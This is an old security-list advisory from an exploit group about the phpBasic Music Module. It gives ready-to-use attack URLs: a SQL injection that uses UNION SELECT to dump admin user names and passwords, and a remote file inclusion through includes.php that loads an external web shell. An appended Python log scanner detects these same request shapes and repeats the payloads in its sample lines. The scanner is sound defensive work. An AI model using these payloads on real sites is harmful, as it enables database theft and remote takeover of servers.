SECURITYVULNS:DOC:18278
Oct 24, 2007 - 12:00 a.m.

[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

Software : phpBasic Music Module
Homepage : http://phpbasic.com/

  1. SQL Injection by Xcross87 :
    Proof of concept :
    http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]
    Xploit admin user account :
    http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

  2. RFI by Alucar :
    Xploit :
    http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== …::Xcross87::… | …::Alucar::… | HCETeam Xploiter | HCEGroup.Vn ===
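
Added example (not part of the original advisory): a log check for the two request shapes listed above, run over constructed access-log lines. It assumes combined log format, that a legitimate `id` is purely numeric, and that a legitimate `root` is a local path; the finding labels and sample lines are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: an include path never needs a scheme/wrapper ("http:", "php:")
# or a protocol-relative "//host" prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//)', re.I)

def classify(line):
    """Return the findings (hypothetical labels) for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # decodes + and %xx
    findings = []
    # Item 1: ?php=music&basic=view&id=...  Allow-list: id must be digits only.
    if params.get("php") == ["music"] and params.get("basic") == ["view"]:
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("id", [])):
            findings.append("sqli-music-id")
    # Item 2: includes.php?root=...  root must not point at a remote location.
    if url.path.lower().endswith("/includes.php"):
        if any(REMOTE_RE.match(v) for v in params.get("root", [])):
            findings.append("rfi-includes-root")
    return findings

def scan(lines):
    """Return (line_number, findings) for every line with a finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = classify(line)
        if found:
            hits.append((number, found))
    return hits

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Oct/2007:10:00:01 +0000] "GET /phpbasic/?php=music&basic=view&id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Oct/2007:10:00:07 +0000] "GET /phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name+from+php_user/* HTTP/1.1" 200 731',
    '203.0.113.9 - - [24/Oct/2007:10:00:09 +0000] "GET /phpbasic/?php=music&basic=view&id=%27 HTTP/1.1" 200 412',
    '203.0.113.9 - - [24/Oct/2007:10:00:15 +0000] "GET /phpbasic/includes.php?root=http://example.invalid/x.txt HTTP/1.1" 200 88',
    '198.51.100.2 - - [24/Oct/2007:10:01:00 +0000] "GET /phpbasic/includes.php?root=lib/ HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ",".join(found))
```
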